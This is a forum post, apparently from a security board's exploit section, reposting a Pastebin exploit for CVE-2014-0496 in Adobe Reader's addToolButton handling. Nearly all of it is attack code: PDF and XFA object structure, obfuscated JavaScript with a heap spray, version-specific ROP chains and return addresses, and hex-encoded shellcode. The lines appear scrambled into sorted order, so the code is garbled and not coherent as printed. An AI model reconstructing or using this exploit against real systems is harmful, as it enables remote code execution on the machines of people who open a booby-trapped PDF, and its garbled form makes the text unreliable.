Jump to content
Nytro

CVE-2014-0496 Adobe Pdf Exploit ToolButton

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h]

    

    @PhysicalDrive0

        });
    1 0 obj
    2 0 obj
    3 0 obj
    4 0 obj
    5 0 obj
    6 0 obj
    7 0 obj
      aaa += aaa;
            aa=dd13.split("%u");
                    aa[i]=str12+aa[i];
    /AcroForm 6 0 R
      addButtonFunc = function () {
            af1="aaaaa%aaaaaaaauaaaaaa";
            af1=af1[("112","a2s1","replace")](/a/g,'');
        app.addToolButton({
      app.addToolButton({
      app.alert('123');
        app.removeToolButton({
      as1211();
      bbb += aaa;
      bbb = bbb.substring(0, i11 / 2);
      bbb += sa;
      bbb += str;
                    break;
             ccc += ccc;
        cEnable: "addButtonFunc();"
          cEnable: "removeButtonFunc();"
          cExec: "1",
        cExec: "1",
            cName: "evil"
        cName: "evil",
          cName: "xxx",
    </config>
    <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    /Count 1
            dd13=aa.join('%u');
            dd13=af1+dd13;
            dd13=xx13.join('%u');
    } else {
    } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
    } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
    endobj
    endstream
        for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
      for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
        for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
            for (i = 0; i < aa[tt1]; i++)
      for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
      function as1211()
    function heapSpray(str, str_addr, r_addr) {
    function opp12(xx13)
      heapSpray(payload, ret_addr, r_addr);
    if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
            if(ccc[tt] >= (0x40000*2))
              if(j)
      if (!r11) {
    if (vulnerable) {
              j=4-aa[i][tt1];
    /Kids [3 0 R]
    <</Length 10074>>
    <</Length 372>>
      obj_size = 0x330 + 0x1c;
      obj_size = 0x360 + 0x1c;
      obj_size = 0x370;
    /OpenAction 4 0 R
    /Pages 2 0 R
    <pageSet></pageSet>
    /Parent 2 0 R
      part1 += rop_addr;
    %%%%%PDF-6.5
    PE/%%%%%%
    <present><pdf><interactive>1</interactive></pdf></present>
      r11 = true;
      r_addr = 0x08a8;
      r_addr = 0x08e4;
      r_addr = 0x08e8;
      removeButtonFunc = function () {
      ret_addr = this[un12]("%u8003%u4a84");
      ret_addr = this[un12]("%ua83e%u4a82");
      ret_addr = this[un12]("%ua8df%u4a82");
      return;
            return dd13;
      rop_addr = this[un12]("%u08a8%u0c0c");
      rop_addr = this[un12]("%u08e4%u0c0c");
      rop_addr = this[un12]("%u08e8%u0c0c");
      rop = rop10;
      rop = rop11;
      rop = rop9;
    <</Size 8/Root 1 0 R>>
                    str12=new Array(j+1).join("0");
    stream
    <subform name="form1" layout="tb" locale="en_US">
    </subform></template></xdp:xdp>
    <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    trailer
    tt1=tt1[("112","a2s1","replace")](/a/g,'');
      tt=tt[("112","a2s1","replace")](/a/g,'');
    /tYPE/aCTION/S/JavaScript/JS 5 0 R>>
    /type /Page
    /Type /Page
    /Type /Pages
      un12='';
        un12=un12[("112","as1","replace")](/w/g,'');
      un12="uwnwwewwwswcwwwawwpwe";
      var aaa = this[un12]("%u0c0c");
      var arr = new Array();
      var bbb = aaa.substring(0, i1 / 2);
      var ccc = bbb.substring(0, i2 / 2);
      var ddd = ccc.substring(0, 0x80000 - i3);
      var eee = new Array();
    var executable = "";
      var i11 = 0x0c0c - 0x24;
      var i1 = r_addr - 0x24;
      var i2 = 0x4000 + 0xc000;
      var i3 = (0x1020 - 0x08) / 2;
    var obj_size;
      var part1 = "";
      var part2 = "";
      var part2_len = obj_size - part1[tt1] * 2;
      var payload = rop + shellcode;
    var r11 = false;
    var r_addr;
    var ret_addr;
    var rop;
    var rop10 = this[("123","1a1",un12)](opp12(xx132));
    var rop11 = this[("123","1a1",un12)](opp12(xx131));
    var rop9 = this[("123","1a1",un12)](opp12(xx133));
    var rop_addr;
      var sa = str_addr;
    var shellcode = this[("123","1a1",un12)](opp12(xx134));
    var tt1="alaaeaanaaagataaah";
      var tt="alaaeaanaagataah";
    var vulnerable = true;
    var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
    var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
    var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
    var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
      vulnerable = false;
      while (1)
      while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
      while (sa[tt] < (xxx - r_addr)) sa += sa;
    x11=9;
    <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <</XFA 7 0 R>>
    <?xml version="1.0" encoding="UTF-8"?>
      xxx=0x0c0c;

Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...